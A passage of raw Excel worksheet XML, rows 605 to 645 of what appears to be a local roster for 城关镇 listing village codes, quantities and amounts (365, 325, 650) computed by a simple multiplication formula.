      <c r="B605" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C605" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D605" s="24" t="s">
        <v>1667</v>
      </c>
      <c r="E605" s="24" t="s">
        <v>1668</v>
      </c>
      <c r="F605" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G605" s="24">
        <v>1</v>
      </c>
      <c r="H605" s="25">
        <v>365</v>
      </c>
      <c r="I605" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J605" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K605" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="606" customHeight="1" spans="1:12">
      <c r="A606" s="23" t="s">
        <v>1669</v>
      </c>
      <c r="B606" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C606" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D606" s="24" t="s">
        <v>1670</v>
      </c>
      <c r="E606" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F606" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G606" s="24">
        <v>1</v>
      </c>
      <c r="H606" s="25">
        <v>365</v>
      </c>
      <c r="I606" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J606" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K606" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="607" customHeight="1" spans="1:12">
      <c r="A607" s="23" t="s">
        <v>1671</v>
      </c>
      <c r="B607" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C607" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D607" s="24" t="s">
        <v>1672</v>
      </c>
      <c r="E607" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F607" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G607" s="24">
        <v>2</v>
      </c>
      <c r="H607" s="25">
        <v>325</v>
      </c>
      <c r="I607" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J607" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K607" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="608" s="2" customFormat="1" ht="21" customHeight="1" spans="1:12">
      <c r="A608" s="23" t="s">
        <v>1673</v>
      </c>
      <c r="B608" s="34" t="s">
        <v>219</v>
      </c>
      <c r="C608" s="27" t="s">
        <v>1674</v>
      </c>
      <c r="D608" s="27" t="s">
        <v>1675</v>
      </c>
      <c r="E608" s="27" t="s">
        <v>627</v>
      </c>
      <c r="F608" s="27" t="s">
        <v>289</v>
      </c>
      <c r="G608" s="27"/>
      <c r="H608" s="27"/>
      <c r="I608" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J608" s="35" t="s">
        <v>1242</v>
      </c>
      <c r="K608" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L608" s="8"/>
    </row>
    <row r="609" customHeight="1" spans="1:11">
      <c r="A609" s="23" t="s">
        <v>1676</v>
      </c>
      <c r="B609" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C609" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D609" s="24" t="s">
        <v>1677</v>
      </c>
      <c r="E609" s="24" t="s">
        <v>572</v>
      </c>
      <c r="F609" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G609" s="24">
        <v>1</v>
      </c>
      <c r="H609" s="25">
        <v>365</v>
      </c>
      <c r="I609" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J609" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K609" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="610" customHeight="1" spans="1:11">
      <c r="A610" s="23" t="s">
        <v>1678</v>
      </c>
      <c r="B610" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C610" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D610" s="24" t="s">
        <v>1679</v>
      </c>
      <c r="E610" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F610" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G610" s="24">
        <v>2</v>
      </c>
      <c r="H610" s="25">
        <v>325</v>
      </c>
      <c r="I610" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J610" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K610" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="611" customHeight="1" spans="1:11">
      <c r="A611" s="23" t="s">
        <v>1680</v>
      </c>
      <c r="B611" s="24" t="str">
        <f>B610</f>
        <v>城关镇</v>
      </c>
      <c r="C611" s="24" t="str">
        <f>C610</f>
        <v>东北村</v>
      </c>
      <c r="D611" s="30" t="s">
        <v>1681</v>
      </c>
      <c r="E611" s="31" t="s">
        <v>346</v>
      </c>
      <c r="F611" s="24" t="str">
        <f>F610</f>
        <v>4113210103</v>
      </c>
      <c r="G611" s="24"/>
      <c r="H611" s="24"/>
      <c r="I611" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J611" s="24"/>
      <c r="K611" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="612" customHeight="1" spans="1:11">
      <c r="A612" s="23" t="s">
        <v>1682</v>
      </c>
      <c r="B612" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C612" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D612" s="24" t="s">
        <v>1684</v>
      </c>
      <c r="E612" s="24" t="s">
        <v>1269</v>
      </c>
      <c r="F612" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G612" s="24">
        <v>2</v>
      </c>
      <c r="H612" s="25">
        <v>345</v>
      </c>
      <c r="I612" s="24">
        <f t="shared" si="9"/>
        <v>690</v>
      </c>
      <c r="J612" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K612" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="613" customHeight="1" spans="1:11">
      <c r="A613" s="23" t="s">
        <v>1685</v>
      </c>
      <c r="B613" s="24" t="str">
        <f>B612</f>
        <v>城关镇</v>
      </c>
      <c r="C613" s="24" t="str">
        <f>C612</f>
        <v>城关西北</v>
      </c>
      <c r="D613" s="30" t="s">
        <v>1686</v>
      </c>
      <c r="E613" s="31" t="s">
        <v>597</v>
      </c>
      <c r="F613" s="24" t="str">
        <f>F612</f>
        <v>4113210106</v>
      </c>
      <c r="G613" s="24"/>
      <c r="H613" s="24"/>
      <c r="I613" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J613" s="24"/>
      <c r="K613" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="614" customHeight="1" spans="1:11">
      <c r="A614" s="23" t="s">
        <v>1687</v>
      </c>
      <c r="B614" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C614" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D614" s="24" t="s">
        <v>1688</v>
      </c>
      <c r="E614" s="24" t="s">
        <v>1689</v>
      </c>
      <c r="F614" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G614" s="24">
        <v>1</v>
      </c>
      <c r="H614" s="25">
        <v>365</v>
      </c>
      <c r="I614" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J614" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K614" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="615" customHeight="1" spans="1:11">
      <c r="A615" s="23" t="s">
        <v>1690</v>
      </c>
      <c r="B615" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C615" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D615" s="24" t="s">
        <v>1692</v>
      </c>
      <c r="E615" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F615" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G615" s="24">
        <v>1</v>
      </c>
      <c r="H615" s="25">
        <v>365</v>
      </c>
      <c r="I615" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J615" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K615" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="616" customHeight="1" spans="1:11">
      <c r="A616" s="23" t="s">
        <v>1693</v>
      </c>
      <c r="B616" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C616" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D616" s="24" t="s">
        <v>1694</v>
      </c>
      <c r="E616" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F616" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G616" s="24">
        <v>1</v>
      </c>
      <c r="H616" s="25">
        <v>365</v>
      </c>
      <c r="I616" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J616" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K616" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="617" customHeight="1" spans="1:11">
      <c r="A617" s="23" t="s">
        <v>1695</v>
      </c>
      <c r="B617" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C617" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D617" s="24" t="s">
        <v>1696</v>
      </c>
      <c r="E617" s="24" t="s">
        <v>276</v>
      </c>
      <c r="F617" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G617" s="24">
        <v>2</v>
      </c>
      <c r="H617" s="25">
        <v>325</v>
      </c>
      <c r="I617" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J617" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K617" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="618" customHeight="1" spans="1:11">
      <c r="A618" s="23" t="s">
        <v>1697</v>
      </c>
      <c r="B618" s="24" t="str">
        <f>B617</f>
        <v>城关镇</v>
      </c>
      <c r="C618" s="24" t="str">
        <f>C617</f>
        <v>城关中华</v>
      </c>
      <c r="D618" s="30" t="s">
        <v>1698</v>
      </c>
      <c r="E618" s="31" t="s">
        <v>1699</v>
      </c>
      <c r="F618" s="24" t="str">
        <f>F617</f>
        <v>4113210108</v>
      </c>
      <c r="G618" s="24"/>
      <c r="H618" s="24"/>
      <c r="I618" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J618" s="24"/>
      <c r="K618" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="619" customHeight="1" spans="1:11">
      <c r="A619" s="23" t="s">
        <v>1700</v>
      </c>
      <c r="B619" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C619" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D619" s="24" t="s">
        <v>1701</v>
      </c>
      <c r="E619" s="24" t="s">
        <v>1702</v>
      </c>
      <c r="F619" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G619" s="24">
        <v>1</v>
      </c>
      <c r="H619" s="25">
        <v>365</v>
      </c>
      <c r="I619" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J619" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K619" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="620" customHeight="1" spans="1:11">
      <c r="A620" s="23" t="s">
        <v>1703</v>
      </c>
      <c r="B620" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C620" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D620" s="24" t="s">
        <v>1704</v>
      </c>
      <c r="E620" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F620" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G620" s="24">
        <v>1</v>
      </c>
      <c r="H620" s="25">
        <v>365</v>
      </c>
      <c r="I620" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J620" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K620" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="621" customHeight="1" spans="1:11">
      <c r="A621" s="23" t="s">
        <v>1705</v>
      </c>
      <c r="B621" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C621" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D621" s="24" t="s">
        <v>1706</v>
      </c>
      <c r="E621" s="24" t="s">
        <v>334</v>
      </c>
      <c r="F621" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G621" s="24">
        <v>1</v>
      </c>
      <c r="H621" s="25">
        <v>365</v>
      </c>
      <c r="I621" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J621" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K621" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="622" customHeight="1" spans="1:11">
      <c r="A622" s="23" t="s">
        <v>1707</v>
      </c>
      <c r="B622" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C622" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D622" s="24" t="s">
        <v>1709</v>
      </c>
      <c r="E622" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F622" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G622" s="24">
        <v>1</v>
      </c>
      <c r="H622" s="25">
        <v>365</v>
      </c>
      <c r="I622" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J622" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K622" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="623" customHeight="1" spans="1:11">
      <c r="A623" s="23" t="s">
        <v>1710</v>
      </c>
      <c r="B623" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C623" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D623" s="24" t="s">
        <v>1711</v>
      </c>
      <c r="E623" s="24" t="s">
        <v>1712</v>
      </c>
      <c r="F623" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G623" s="24">
        <v>1</v>
      </c>
      <c r="H623" s="25">
        <v>365</v>
      </c>
      <c r="I623" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J623" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K623" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="624" customHeight="1" spans="1:11">
      <c r="A624" s="23" t="s">
        <v>1713</v>
      </c>
      <c r="B624" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C624" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D624" s="24" t="s">
        <v>1714</v>
      </c>
      <c r="E624" s="24" t="s">
        <v>572</v>
      </c>
      <c r="F624" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G624" s="24">
        <v>1</v>
      </c>
      <c r="H624" s="25">
        <v>365</v>
      </c>
      <c r="I624" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J624" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K624" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="625" customHeight="1" spans="1:11">
      <c r="A625" s="23" t="s">
        <v>1715</v>
      </c>
      <c r="B625" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C625" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D625" s="24" t="s">
        <v>1716</v>
      </c>
      <c r="E625" s="24" t="s">
        <v>416</v>
      </c>
      <c r="F625" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G625" s="24">
        <v>1</v>
      </c>
      <c r="H625" s="25">
        <v>365</v>
      </c>
      <c r="I625" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J625" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K625" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="626" customHeight="1" spans="1:11">
      <c r="A626" s="23" t="s">
        <v>1717</v>
      </c>
      <c r="B626" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C626" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D626" s="24" t="s">
        <v>1718</v>
      </c>
      <c r="E626" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F626" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G626" s="24">
        <v>2</v>
      </c>
      <c r="H626" s="25">
        <v>325</v>
      </c>
      <c r="I626" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J626" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K626" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="627" customHeight="1" spans="1:11">
      <c r="A627" s="23" t="s">
        <v>1719</v>
      </c>
      <c r="B627" s="24" t="str">
        <f>B626</f>
        <v>城关镇</v>
      </c>
      <c r="C627" s="24" t="str">
        <f>C626</f>
        <v>城关西北</v>
      </c>
      <c r="D627" s="26" t="s">
        <v>1720</v>
      </c>
      <c r="E627" s="26" t="s">
        <v>572</v>
      </c>
      <c r="F627" s="24" t="str">
        <f>F626</f>
        <v>4113210106</v>
      </c>
      <c r="G627" s="24"/>
      <c r="H627" s="24"/>
      <c r="I627" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J627" s="24"/>
      <c r="K627" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="628" customHeight="1" spans="1:11">
      <c r="A628" s="23" t="s">
        <v>1721</v>
      </c>
      <c r="B628" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C628" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D628" s="24" t="s">
        <v>1722</v>
      </c>
      <c r="E628" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F628" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G628" s="24">
        <v>1</v>
      </c>
      <c r="H628" s="25">
        <v>365</v>
      </c>
      <c r="I628" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J628" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K628" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="629" customHeight="1" spans="1:11">
      <c r="A629" s="23" t="s">
        <v>1723</v>
      </c>
      <c r="B629" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C629" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D629" s="24" t="s">
        <v>1724</v>
      </c>
      <c r="E629" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F629" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G629" s="24">
        <v>1</v>
      </c>
      <c r="H629" s="25">
        <v>365</v>
      </c>
      <c r="I629" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J629" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K629" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="630" customHeight="1" spans="1:11">
      <c r="A630" s="23" t="s">
        <v>1725</v>
      </c>
      <c r="B630" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C630" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D630" s="24" t="s">
        <v>1726</v>
      </c>
      <c r="E630" s="24" t="s">
        <v>1727</v>
      </c>
      <c r="F630" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G630" s="24">
        <v>1</v>
      </c>
      <c r="H630" s="25">
        <v>365</v>
      </c>
      <c r="I630" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J630" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K630" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="631" customHeight="1" spans="1:11">
      <c r="A631" s="23" t="s">
        <v>1728</v>
      </c>
      <c r="B631" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C631" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D631" s="24" t="s">
        <v>1729</v>
      </c>
      <c r="E631" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F631" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G631" s="24">
        <v>2</v>
      </c>
      <c r="H631" s="25">
        <v>325</v>
      </c>
      <c r="I631" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J631" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K631" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="632" customHeight="1" spans="1:11">
      <c r="A632" s="23" t="s">
        <v>1730</v>
      </c>
      <c r="B632" s="24" t="str">
        <f>B631</f>
        <v>城关镇</v>
      </c>
      <c r="C632" s="24" t="str">
        <f>C631</f>
        <v>城关中华</v>
      </c>
      <c r="D632" s="36" t="s">
        <v>1731</v>
      </c>
      <c r="E632" s="36" t="s">
        <v>1732</v>
      </c>
      <c r="F632" s="24" t="str">
        <f>F631</f>
        <v>4113210108</v>
      </c>
      <c r="G632" s="24"/>
      <c r="H632" s="24"/>
      <c r="I632" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J632" s="24"/>
      <c r="K632" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="633" customHeight="1" spans="1:11">
      <c r="A633" s="23" t="s">
        <v>1733</v>
      </c>
      <c r="B633" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C633" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D633" s="24" t="s">
        <v>1734</v>
      </c>
      <c r="E633" s="24" t="s">
        <v>1735</v>
      </c>
      <c r="F633" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G633" s="24">
        <v>1</v>
      </c>
      <c r="H633" s="25">
        <v>365</v>
      </c>
      <c r="I633" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J633" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K633" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="634" customHeight="1" spans="1:11">
      <c r="A634" s="23" t="s">
        <v>1736</v>
      </c>
      <c r="B634" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C634" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D634" s="24" t="s">
        <v>1737</v>
      </c>
      <c r="E634" s="24" t="s">
        <v>1738</v>
      </c>
      <c r="F634" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G634" s="24">
        <v>2</v>
      </c>
      <c r="H634" s="25">
        <v>325</v>
      </c>
      <c r="I634" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J634" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K634" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="635" customHeight="1" spans="1:11">
      <c r="A635" s="23" t="s">
        <v>1739</v>
      </c>
      <c r="B635" s="24" t="str">
        <f>B634</f>
        <v>城关镇</v>
      </c>
      <c r="C635" s="24" t="str">
        <f>C634</f>
        <v>城关中华</v>
      </c>
      <c r="D635" s="26" t="s">
        <v>1740</v>
      </c>
      <c r="E635" s="26" t="s">
        <v>1741</v>
      </c>
      <c r="F635" s="24" t="str">
        <f>F634</f>
        <v>4113210108</v>
      </c>
      <c r="G635" s="24"/>
      <c r="H635" s="24"/>
      <c r="I635" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J635" s="24"/>
      <c r="K635" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="636" customHeight="1" spans="1:11">
      <c r="A636" s="23" t="s">
        <v>1742</v>
      </c>
      <c r="B636" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C636" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D636" s="24" t="s">
        <v>1743</v>
      </c>
      <c r="E636" s="24" t="s">
        <v>1602</v>
      </c>
      <c r="F636" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G636" s="24">
        <v>1</v>
      </c>
      <c r="H636" s="25">
        <v>365</v>
      </c>
      <c r="I636" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J636" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K636" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="637" customHeight="1" spans="1:11">
      <c r="A637" s="23" t="s">
        <v>1744</v>
      </c>
      <c r="B637" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C637" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D637" s="24" t="s">
        <v>1745</v>
      </c>
      <c r="E637" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F637" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G637" s="24">
        <v>2</v>
      </c>
      <c r="H637" s="25">
        <v>325</v>
      </c>
      <c r="I637" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J637" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K637" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="638" customHeight="1" spans="1:11">
      <c r="A638" s="23" t="s">
        <v>1746</v>
      </c>
      <c r="B638" s="24" t="str">
        <f>B637</f>
        <v>城关镇</v>
      </c>
      <c r="C638" s="24" t="str">
        <f>C637</f>
        <v>城关中华</v>
      </c>
      <c r="D638" s="23" t="s">
        <v>1747</v>
      </c>
      <c r="E638" s="23" t="s">
        <v>572</v>
      </c>
      <c r="F638" s="24" t="str">
        <f>F637</f>
        <v>4113210108</v>
      </c>
      <c r="G638" s="24"/>
      <c r="H638" s="24"/>
      <c r="I638" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J638" s="24"/>
      <c r="K638" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="639" customHeight="1" spans="1:11">
      <c r="A639" s="23" t="s">
        <v>1748</v>
      </c>
      <c r="B639" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C639" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D639" s="24" t="s">
        <v>1749</v>
      </c>
      <c r="E639" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F639" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G639" s="24">
        <v>1</v>
      </c>
      <c r="H639" s="25">
        <v>365</v>
      </c>
      <c r="I639" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J639" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K639" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="640" customHeight="1" spans="1:11">
      <c r="A640" s="23" t="s">
        <v>1750</v>
      </c>
      <c r="B640" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C640" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D640" s="24" t="s">
        <v>1751</v>
      </c>
      <c r="E640" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F640" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G640" s="24">
        <v>1</v>
      </c>
      <c r="H640" s="25">
        <v>365</v>
      </c>
      <c r="I640" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J640" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K640" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="641" customHeight="1" spans="1:11">
      <c r="A641" s="23" t="s">
        <v>1752</v>
      </c>
      <c r="B641" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C641" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D641" s="24" t="s">
        <v>1753</v>
      </c>
      <c r="E641" s="24" t="s">
        <v>1754</v>
      </c>
      <c r="F641" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G641" s="24">
        <v>2</v>
      </c>
      <c r="H641" s="25">
        <v>325</v>
      </c>
      <c r="I641" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J641" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K641" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="642" customHeight="1" spans="1:11">
      <c r="A642" s="23" t="s">
        <v>1755</v>
      </c>
      <c r="B642" s="24" t="str">
        <f>B641</f>
        <v>城关镇</v>
      </c>
      <c r="C642" s="24" t="str">
        <f>C641</f>
        <v>城关中华</v>
      </c>
      <c r="D642" s="30" t="s">
        <v>1756</v>
      </c>
      <c r="E642" s="30" t="s">
        <v>1757</v>
      </c>
      <c r="F642" s="24" t="str">
        <f>F641</f>
        <v>4113210108</v>
      </c>
      <c r="G642" s="24"/>
      <c r="H642" s="24"/>
      <c r="I642" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J642" s="24"/>
      <c r="K642" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="643" customHeight="1" spans="1:11">
      <c r="A643" s="23" t="s">
        <v>1758</v>
      </c>
      <c r="B643" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C643" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D643" s="24" t="s">
        <v>1759</v>
      </c>
      <c r="E643" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F643" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G643" s="24">
        <v>1</v>
      </c>
      <c r="H643" s="25">
        <v>365</v>
      </c>
      <c r="I643" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J643" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K643" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="644" customHeight="1" spans="1:11">
      <c r="A644" s="23" t="s">
        <v>1760</v>
      </c>
      <c r="B644" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C644" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D644" s="24" t="s">
        <v>1761</v>
      </c>
      <c r="E644" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F644" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G644" s="24">
        <v>1</v>
      </c>
      <c r="H644" s="25">
        <v>365</v>
      </c>
      <c r="I644" s="24">
        <f t="shared" ref="I644:I707" si="10">H644*G644</f>
        <v>365</v>
      </c>
      <c r="J644" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K644" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="645" customHeight="1" spans="1:11">
      <c r="A645" s="23" t="s">
        <v>1762</v>
      </c>
      <c r="B645" s="24" t="s">
